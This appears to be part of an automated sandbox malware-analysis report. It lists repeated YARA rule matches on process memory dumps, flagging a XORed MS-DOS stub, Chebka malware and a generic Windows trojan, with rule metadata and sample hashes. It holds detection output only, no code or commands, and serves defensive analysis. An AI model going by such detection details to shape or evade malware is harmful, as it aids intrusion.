      Source: 00000022.00000003.393309641.000001AF63730000.00000004.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, score = , reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings
      Source: 00000022.00000003.393309641.000001AF63730000.00000004.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Generic_a681f24a reference_sample = a796f316b1ed7fa809d9ad5e9b25bd780db76001345ea83f5035a33618f927fa, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Generic, fingerprint = 6323ed5b60e728297de19c878cd96b429bfd6d82157b4cf3475f3a3123921ae0, id = a681f24a-7054-4525-bcf8-3ee64a1d8413, last_modified = 2021-08-23
      Source: 0000000B.00000002.799791043.0000022BAF530000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, score = , reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings
      Source: 0000000B.00000002.799791043.0000022BAF530000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_Chebka author = ditekSHen, description = Detects Chebka
      Source: 0000000B.00000002.799791043.0000022BAF530000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Generic_a681f24a reference_sample = a796f316b1ed7fa809d9ad5e9b25bd780db76001345ea83f5035a33618f927fa, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Generic, fingerprint = 6323ed5b60e728297de19c878cd96b429bfd6d82157b4cf3475f3a3123921ae0, id = a681f24a-7054-4525-bcf8-3ee64a1d8413, last_modified = 2021-08-23
      Source: 0000001F.00000000.375012972.000001F1ED200000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, score = , reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings
      Source: 0000001F.00000000.375012972.000001F1ED200000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_Chebka author = ditekSHen, description = Detects Chebka
      Source: 0000001F.00000000.375012972.000001F1ED200000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Generic_a681f24a reference_sample = a796f316b1ed7fa809d9ad5e9b25bd780db76001345ea83f5035a33618f927fa, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Generic, fingerprint = 6323ed5b60e728297de19c878cd96b429bfd6d82157b4cf3475f3a3123921ae0, id = a681f24a-7054-4525-bcf8-3ee64a1d8413, last_modified = 2021-08-23
      Source: 0000001E.00000002.799872918.0000021BD8470000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, score = , reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings
      Source: 0000001E.00000002.799872918.0000021BD8470000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_Chebka author = ditekSHen, description = Detects Chebka
      Source: 0000001E.00000002.799872918.0000021BD8470000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Generic_a681f24a reference_sample = a796f316b1ed7fa809d9ad5e9b25bd780db76001345ea83f5035a33618f927fa, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Generic, fingerprint = 6323ed5b60e728297de19c878cd96b429bfd6d82157b4cf3475f3a3123921ae0, id = a681f24a-7054-4525-bcf8-3ee64a1d8413, last_modified = 2021-08-23
      Source: 00000015.00000003.314976942.000001F97F0B0000.00000004.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, score = , reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings
      Source: 00000015.00000003.314976942.000001F97F0B0000.00000004.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Generic_a681f24a reference_sample = a796f316b1ed7fa809d9ad5e9b25bd780db76001345ea83f5035a33618f927fa, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Generic, fingerprint = 6323ed5b60e728297de19c878cd96b429bfd6d82157b4cf3475f3a3123921ae0, id = a681f24a-7054-4525-bcf8-3ee64a1d8413, last_modified = 2021-08-23
      Source: 00000016.00000002.808465938.000001B6D6000000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, score = , reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings
      Source: 00000016.00000002.808465938.000001B6D6000000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_Chebka author = ditekSHen, description = Detects Chebka
      Source: 00000016.00000002.808465938.000001B6D6000000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Generic_a681f24a reference_sample = a796f316b1ed7fa809d9ad5e9b25bd780db76001345ea83f5035a33618f927fa, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Generic, fingerprint = 6323ed5b60e728297de19c878cd96b429bfd6d82157b4cf3475f3a3123921ae0, id = a681f24a-7054-4525-bcf8-3ee64a1d8413, last_modified = 2021-08-23
      Source: 00000029.00000003.441340256.000002B668080000.00000004.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, score = , reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings
      Source: 00000029.00000003.441340256.000002B668080000.00000004.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Generic_a681f24a reference_sample = a796f316b1ed7fa809d9ad5e9b25bd780db76001345ea83f5035a33618f927fa, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Generic, fingerprint = 6323ed5b60e728297de19c878cd96b429bfd6d82157b4cf3475f3a3123921ae0, id = a681f24a-7054-4525-bcf8-3ee64a1d8413, last_modified = 2021-08-23
      Source: 00000024.00000002.804697134.000001DD8FDB0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, score = , reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings
      Source: 00000024.00000002.804697134.000001DD8FDB0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_Chebka author = ditekSHen, description = Detects Chebka
      Source: 00000024.00000002.804697134.000001DD8FDB0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Generic_a681f24a reference_sample = a796f316b1ed7fa809d9ad5e9b25bd780db76001345ea83f5035a33618f927fa, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Generic, fingerprint = 6323ed5b60e728297de19c878cd96b429bfd6d82157b4cf3475f3a3123921ae0, id = a681f24a-7054-4525-bcf8-3ee64a1d8413, last_modified = 2021-08-23
      Source: 00000015.00000002.801898708.000001F97F120000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, score = , reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings
      Source: 00000015.00000002.801898708.000001F97F120000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_Chebka author = ditekSHen, description = Detects Chebka
      Source: 00000015.00000002.801898708.000001F97F120000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Generic_a681f24a reference_sample = a796f316b1ed7fa809d9ad5e9b25bd780db76001345ea83f5035a33618f927fa, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Generic, fingerprint = 6323ed5b60e728297de19c878cd96b429bfd6d82157b4cf3475f3a3123921ae0, id = a681f24a-7054-4525-bcf8-3ee64a1d8413, last_modified = 2021-08-23
      Source: 0000001A.00000000.336709746.00000226F8D40000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, score = , reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings
      Source: 0000001A.00000000.336709746.00000226F8D40000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_Chebka author = ditekSHen, description = Detects Chebka
      Source: 0000001A.00000000.336709746.00000226F8D40000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Generic_a681f24a reference_sample = a796f316b1ed7fa809d9ad5e9b25bd780db76001345ea83f5035a33618f927fa, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Generic, fingerprint = 6323ed5b60e728297de19c878cd96b429bfd6d82157b4cf3475f3a3123921ae0, id = a681f24a-7054-4525-bcf8-3ee64a1d8413, last_modified = 2021-08-23
      Source: 0000000B.00000003.287397377.0000022BAF4C0000.00000004.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, score = , reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings
      Source: 0000000B.00000003.287397377.0000022BAF4C0000.00000004.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Generic_a681f24a reference_sample = a796f316b1ed7fa809d9ad5e9b25bd780db76001345ea83f5035a33618f927fa, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Generic, fingerprint = 6323ed5b60e728297de19c878cd96b429bfd6d82157b4cf3475f3a3123921ae0, id = a681f24a-7054-4525-bcf8-3ee64a1d8413, last_modified = 2021-08-23
      Source: 00000016.00000000.321842049.000001B6D6000000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, score = , reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings
      Source: 00000016.00000000.321842049.000001B6D6000000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_Chebka author = ditekSHen, description = Detects Chebka
      Source: 00000016.00000000.321842049.000001B6D6000000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Generic_a681f24a reference_sample = a796f316b1ed7fa809d9ad5e9b25bd780db76001345ea83f5035a33618f927fa, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Generic, fingerprint = 6323ed5b60e728297de19c878cd96b429bfd6d82157b4cf3475f3a3123921ae0, id = a681f24a-7054-4525-bcf8-3ee64a1d8413, last_modified = 2021-08-23
      Source: 00000019.00000003.330553966.0000025139790000.00000004.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, score = , reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings
      Source: 00000019.00000003.330553966.0000025139790000.00000004.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Generic_a681f24a reference_sample = a796f316b1ed7fa809d9ad5e9b25bd780db76001345ea83f5035a33618f927fa, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Generic, fingerprint = 6323ed5b60e728297de19c878cd96b429bfd6d82157b4cf3475f3a3123921ae0, id = a681f24a-7054-4525-bcf8-3ee64a1d8413, last_modified = 2021-08-23
      Source: 0000001D.00000002.807566402.00000236F3940000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, score = , reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings
      Source: 0000001D.00000002.807566402.00000236F3940000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_Chebka author = ditekSHen, description = Detects Chebka
      Source: 0000001D.00000002.807566402.00000236F3940000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Generic_a681f24a reference_sample = a796f316b1ed7fa809d9ad5e9b25bd780db76001345ea83f5035a33618f927fa, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Generic, fingerprint = 6323ed5b60e728297de19c878cd96b429bfd6d82157b4cf3475f3a3123921ae0, id = a681f24a-7054-4525-bcf8-3ee64a1d8413, last_modified = 2021-08-23
      Source: 0000001A.00000003.335868543.00000226F8CD0000.00000004.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, score = , reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings
      Source: 0000001A.00000003.335868543.00000226F8CD0000.00000004.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Generic_a681f24a reference_sample = a796f316b1ed7fa809d9ad5e9b25bd780db76001345ea83f5035a33618f927fa, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Generic, fingerprint = 6323ed5b60e728297de19c878cd96b429bfd6d82157b4cf3475f3a3123921ae0, id = a681f24a-7054-4525-bcf8-3ee64a1d8413, last_modified = 2021-08-23
      Source: 00000016.00000003.320275239.000001B6D5F90000.00000004.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, score = , reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings
      Source: 00000016.00000003.320275239.000001B6D5F90000.00000004.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Generic_a681f24a reference_sample = a796f316b1ed7fa809d9ad5e9b25bd780db76001345ea83f5035a33618f927fa, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Generic, fingerprint = 6323ed5b60e728297de19c878cd96b429bfd6d82157b4cf3475f3a3123921ae0, id = a681f24a-7054-4525-bcf8-3ee64a1d8413, last_modified = 2021-08-23
      Source: 00000019.00000000.331593348.0000025139800000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, score = , reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings
      Source: 00000019.00000000.331593348.0000025139800000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_Chebka author = ditekSHen, description = Detects Chebka
      Source: 00000019.00000000.331593348.0000025139800000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Generic_a681f24a reference_sample = a796f316b1ed7fa809d9ad5e9b25bd780db76001345ea83f5035a33618f927fa, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Generic, fingerprint = 6323ed5b60e728297de19c878cd96b429bfd6d82157b4cf3475f3a3123921ae0, id = a681f24a-7054-4525-bcf8-3ee64a1d8413, last_modified = 2021-08-23
      Source: 0000000B.00000000.289004443.0000022BAF530000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, score = , reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings
      Source: 0000000B.00000000.289004443.0000022BAF530000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_Chebka author = ditekSHen, description = Detects Chebka
      Source: 0000000B.00000000.289004443.0000022BAF530000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Generic_a681f24a reference_sample = a796f316b1ed7fa809d9ad5e9b25bd780db76001345ea83f5035a33618f927fa, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Generic, fingerprint = 6323ed5b60e728297de19c878cd96b429bfd6d82157b4cf3475f3a3123921ae0, id = a681f24a-7054-4525-bcf8-3ee64a1d8413, last_modified = 2021-08-23
      Source: 0000000F.00000000.306315437.000001B37C560000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, score = , reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings
      Source: 0000000F.00000000.306315437.000001B37C560000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_Chebka author = ditekSHen, description = Detects Chebka
      Source: 0000000F.00000000.306315437.000001B37C560000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Generic_a681f24a reference_sample = a796f316b1ed7fa809d9ad5e9b25bd780db76001345ea83f5035a33618f927fa, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Generic, fingerprint = 6323ed5b60e728297de19c878cd96b429bfd6d82157b4cf3475f3a3123921ae0, id = a681f24a-7054-4525-bcf8-3ee64a1d8413, last_modified = 2021-08-23
      Source: 0000001D.00000000.361030510.00000236F3940000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, score = , reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings
      Source: 0000001D.00000000.361030510.00000236F3940000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_Chebka author = ditekSHen, description = Detects Chebka
      Source: 0000001D.00000000.361030510.00000236F3940000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Generic_a681f24a reference_sample = a796f316b1ed7fa809d9ad5e9b25bd780db76001345ea83f5035a33618f927fa, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Generic, fingerprint = 6323ed5b60e728297de19c878cd96b429bfd6d82157b4cf3475f3a3123921ae0, id = a681f24a-7054-4525-bcf8-3ee64a1d8413, last_modified = 2021-08-23
      Source: 00000021.00000000.387328234.000001E554740000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, score = , reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings
      Source: 00000021.00000000.387328234.000001E554740000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_Chebka author = ditekSHen, description = Detects Chebka
      Source: 00000021.00000000.387328234.000001E554740000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Generic_a681f24a reference_sample = a796f316b1ed7fa809d9ad5e9b25bd780db76001345ea83f5035a33618f927fa, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Generic, fingerprint = 6323ed5b60e728297de19c878cd96b429bfd6d82157b4cf3475f3a3123921ae0, id = a681f24a-7054-4525-bcf8-3ee64a1d8413, last_modified = 2021-08-23
      Source: 0000001F.00000002.801510749.000001F1ED200000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, score = , reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings
      Source: 0000001F.00000002.801510749.000001F1ED200000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_Chebka author = ditekSHen, description = Detects Chebka
      Source: 0000001F.00000002.801510749.000001F1ED200000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Generic_a681f24a reference_sample = a796f316b1ed7fa809d9ad5e9b25bd780db76001345ea83f5035a33618f927fa, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Generic, fingerprint = 6323ed5b60e728297de19c878cd96b429bfd6d82157b4cf3475f3a3123921ae0, id = a681f24a-7054-4525-bcf8-3ee64a1d8413, last_modified = 2021-08-23
      Source: 0000001E.00000000.368701445.0000021BD8470000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, score = , reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings
      Source: 0000001E.00000000.368701445.0000021BD8470000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_Chebka author = ditekSHen, description = Detects Chebka
      Source: 0000001E.00000000.368701445.0000021BD8470000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Generic_a681f24a reference_sample = a796f316b1ed7fa809d9ad5e9b25bd780db76001345ea83f5035a33618f927fa, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Generic, fingerprint = 6323ed5b60e728297de19c878cd96b429bfd6d82157b4cf3475f3a3123921ae0, id = a681f24a-7054-4525-bcf8-3ee64a1d8413, last_modified = 2021-08-23
      Source: 0000001E.00000003.367749828.0000021BD8400000.00000004.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, score = , reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings
      Source: 0000001E.00000003.367749828.0000021BD8400000.00000004.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Generic_a681f24a reference_sample = a796f316b1ed7fa809d9ad5e9b25bd780db76001345ea83f5035a33618f927fa, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Generic, fingerprint = 6323ed5b60e728297de19c878cd96b429bfd6d82157b4cf3475f3a3123921ae0, id = a681f24a-7054-4525-bcf8-3ee64a1d8413, last_modified = 2021-08-23
      Source: 00000029.00000002.746382396.000002B6680F0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, score = , reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings
      Source: 00000029.00000002.746382396.000002B6680F0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_Chebka author = ditekSHen, description = Detects Chebka
      Source: 00000029.00000002.746382396.000002B6680F0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Generic_a681f24a reference_sample = a796f316b1ed7fa809d9ad5e9b25bd780db76001345ea83f5035a33618f927fa, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Generic, fingerprint = 6323ed5b60e728297de19c878cd96b429bfd6d82157b4cf3475f3a3123921ae0, id = a681f24a-7054-4525-bcf8-3ee64a1d8413, last_modified = 2021-08-23
      Source: 00000018.00000000.327112591.000002468B5B0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, score = , reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings
      Source: 00000018.00000000.327112591.000002468B5B0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_Chebka author = ditekSHen, description = Detects Chebka
      Source: 00000018.00000000.327112591.000002468B5B0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Generic_a681f24a reference_sample = a796f316b1ed7fa809d9ad5e9b25bd780db76001345ea83f5035a33618f927fa, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Generic, fingerprint = 6323ed5b60e728297de19c878cd96b429bfd6d82157b4cf3475f3a3123921ae0, id = a681f24a-7054-4525-bcf8-3ee64a1d8413, last_modified = 2021-08-23
      Source: 0000000F.00000002.536879353.000001B37C560000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, score = , reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings
      Source: 0000000F.00000002.536879353.000001B37C560000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_Chebka author = ditekSHen, description = Detects Chebka
      Source: 0000000F.00000002.536879353.000001B37C560000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Generic_a681f24a reference_sample = a796f316b1ed7fa809d9ad5e9b25bd780db76001345ea83f5035a33618f927fa, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Generic, fingerprint = 6323ed5b60e728297de19c878cd96b429bfd6d82157b4cf3475f3a3123921ae0, id = a681f24a-7054-4525-bcf8-3ee64a1d8413, last_modified = 2021-08-23
      Source: 00000018.00000002.801636123.000002468B5B0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, score = , reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings
      Source: 00000018.00000002.801636123.000002468B5B0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_Chebka author = ditekSHen, description = Detects Chebka
      Source: 00000018.00000002.801636123.000002468B5B0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Generic_a681f24a reference_sample = a796f316b1ed7fa809d9ad5e9b25bd780db76001345ea83f5035a33618f927fa, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Generic, fingerprint = 6323ed5b60e728297de19c878cd96b429bfd6d82157b4cf3475f3a3123921ae0, id = a681f24a-7054-4525-bcf8-3ee64a1d8413, last_modified = 2021-08-23
      Source: 00000023.00000000.400180832.0000023E495B0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, score = , reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings
      Source: 00000023.00000000.400180832.0000023E495B0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_Chebka author = ditekSHen, description = Detects Chebka
      Source: 00000023.00000000.400180832.0000023E495B0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Generic_a681f24a reference_sample = a796f316b1ed7fa809d9ad5e9b25bd780db76001345ea83f5035a33618f927fa, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Generic, fingerprint = 6323ed5b60e728297de19c878cd96b429bfd6d82157b4cf3475f3a3123921ae0, id = a681f24a-7054-4525-bcf8-3ee64a1d8413, last_modified = 2021-08-23
      Source: 00000014.00000002.800595582.000001DBFC920000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, score = , reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings
      Source: 00000014.00000002.800595582.000001DBFC920000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_Chebka author = ditekSHen, description = Detects Chebka
